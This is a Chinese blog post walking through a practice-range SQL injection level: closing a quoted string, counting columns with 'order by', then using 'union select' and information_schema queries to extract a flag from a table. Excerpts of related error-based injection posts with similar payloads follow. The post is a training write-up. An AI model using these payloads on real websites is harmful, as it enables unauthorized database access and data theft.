显错sql注入练习

最新推荐文章于 2022-08-07 22:24:01 发布
最新推荐文章于 2022-08-07 22:24:01 发布
阅读量179 收藏
点赞数
文章标签: 安全漏洞 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/D_Dwjh/article/details/107777325
版权

sql注入rank2

在这里插入图片描述

这里的id是个单引号的字符串,所以要注意,要先把单引号闭合,不然输的东西都变成字符串,我们应该让他变成执行的代码语句。最后还需要把多余的单引号注释掉,不能忘记哦~
输入: ’ and 1=1 – q

输入: ’ and 1=2 – q

发现当成输入语句当成代码来执行了,说明存在sql注入,这里上面url发现是看不懂的编码,可以利用在线url编码工具,进行解码,如下图所示:

然后继续回归正题,发现存在注入点后,开始分析这个注入点存在的字段数
输入: ’ and 1=1 order by 1 – q

输入:’ and 1=1 order by 2 – q

输入: ’ and 1=1 order by 3 – q

输入: ’ and 1=1 order by 4 – q

根据上面order by的测试,发现当前页面的字段数是3,因而,我们可以探测数据库的输出点了。

输入: ’ and 1=2 union select 1,2,3 – q

然后,通过输出点,我们可以探测数据的库名。
输入: ’ and 1=2 union select 1,2,database() limit 0,1-- q

通过改变limit后面的值,尝试是否有其他库名。
limit 1,1

至此发现,这个数据库,只有一个库名,叫error

然后下面开始通过库名,来探测表名了。
输入:
’ and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1-- q

哦豁,惊喜,发现表名“error——flag”
然后继续修改limit的值,往下探测
limit 1,1


哦豁,发现这回是一个“user”的表,猜想可能是存的账户和密码。

继续测试limit 2,1

发现没有显示了,所以这个“error”的数据库中,只有2张表,一个叫“error_flag”,一个叫做“user”。

因为题目要求提交flag,所以首先尝试“error_flag”的表

先探测表的字段名
输入:
’ and 1=2 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ – q

发现flag的踪迹了,下面开始深究里面的值了。

输入:
’ and 1=2 union select 1,2,flag from error_flag limit 0,1-- q

哦豁,发现答案了,至此rank2写完了,和rank1相比,这个就是考验的单引号的闭合和单引号的注释问题。因为在靶场sql提示,所以我们能够很快校验,如果没有提示,是否还是能一帆风顺,需要自己多多思考练习。

简H
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1220
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
SQL注入--显错注入(zkaq)
weixin_74410605的博客
07-11 698
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
Mysql显错注入
weixin_59584646的博客
08-07 258
MySQL显错注入
封神台SQL注入-显错注入
qq_40941912的博客
08-23 1434
一、原理 判断注入点 判断当前页面字段总数 判断显示位 查当前数据库 查表名 查列名 查字段内容 Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等 information_schema.tables 存放表名和库名的对应 information_schema.columns 存放字段名和表名的对应 [注: information_schema.tables
Mysql 报错注入的原理探索
代码析构师的专栏
02-09 2782
我们一般使用的报错语句: 1 select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a; concat:为聚合函数,连接字符串功能 foolr:取float的整数值 rand:取0~1之间随机浮点值,长度测试大概为16-19的样子,官方
sql注入练习工具
11-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
SQL注入练习.rar
06-25
sql-labs,该环境可以用来练习sql注入。是闯关类型的一个靶场环境,从易到难,从简到繁。将每一关都闯过的话,对于sql注入的理解会比较深入。
sqli:SQL注入练习
02-08
sqli:SQL注入练习
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
SQL注入的一个ASP网站源码
03-12
"则表明这个资源适合初学者练习,理解SQL注入的机制以及如何防御此类攻击。 在学习这个源码时,你可以关注以下几个关键知识点: 1. **ASP语法**:了解ASP中的变量、函数、控制结构和数据库交互方式,如使用ADODB...
SQL注入显错注入
秋水的博客
08-30 3677
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
MYSQL报错注入
聚鼎安全
01-08 3276
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MySQL显错注入
weixin_53863129的博客
09-09 94
显错注入 这里拿MySQL数据库做事例,其他数据库方法类似,函数有差异而已 准备知识: 1、MySQL数据库5.0以上版本有系统自带库(information_schema),其他数据库可采用爆破或猜解来得到 2、 库名:table_schema 表名:table_name 字段名:table_column 核心:显错注入,顾名思义就是利用数据库查询语句,将数据库的内容显示出来,一般在回显页面中,网页源代码可能也存在回显 1、判断是否存在注入 http://192.16
显错注入——漏洞记录
chick11的博客
07-07 88
sql注入漏洞测试(报错注入) 访问靶场,又看到通知栏的滚动条 查看url ?id=1 是不是很惊喜。这个东西get传参。 直接在url中操作:’ , ‘ and 1=1 或者 ’and 1=2 注意可以加上--+注释 看一下字段数 order by 5 的时候出现页面报错 说明四个字段,尝试union select 系统过滤了我们输入的union。 怎么办,考虑绕过过滤:大小写,字符串编码 大小写混用,绕过过滤。并获得显错位置 接下来就是常规操作 id=-1
显错注入(一)
qq_45300786的博客
06-24 2779
显错注入(一) 注入环境: http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.
MySQL报错注入方法整理
jpygx123的博客
11-17 9565
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 报错注入:(and后不能直接跟select,可以加()) 1.报错注入floor---->(select 1 from (select count(*),concat((payload[]),floo...
mysql错误回显注入_SQL注入显错注入
weixin_35308770的博客
01-28 730
注入本质?1、 SQL显错注入是最常见的注入。2、 注入攻击的本质,是把用户输入的数据当做SQL语句执行。3、 这里有两个关键条件:第一个是用户能够控制输入。第二个是原本程序要执行的代码,拼接了用户输入的数据,然后进行执行。渗透测试常用函数。1、GROUP_CONCAT(col):返回由属于一组的列值连接组合而成的结果。例如:id=9.9 union select 1,GROUP_CONCAT(...
Webug4.0显错注入
AmyBaby00的博客
01-23 239
进入页面,输入单引在id=1后面加单引号页面报错。 构造查询语句1’ or 1=1%23页面正常显示。 利用order by 语句判断字段数。由1开始输入,输入3时报错,因此判断字段个数是两个。 利用version()语句获得当前数据库版本5.5.53 查询数据库名称 查看webug数据库中的内容。 查看flag表中的内容。 查看flag列中的内容。 得到flag中数据。 ...
CTFsql注入练习
最新发布
07-29
回答: CTFsql注入练习题是一种用于训练和测试SQL注入技巧的题目。在这些题目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些题目通常包含了不同的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值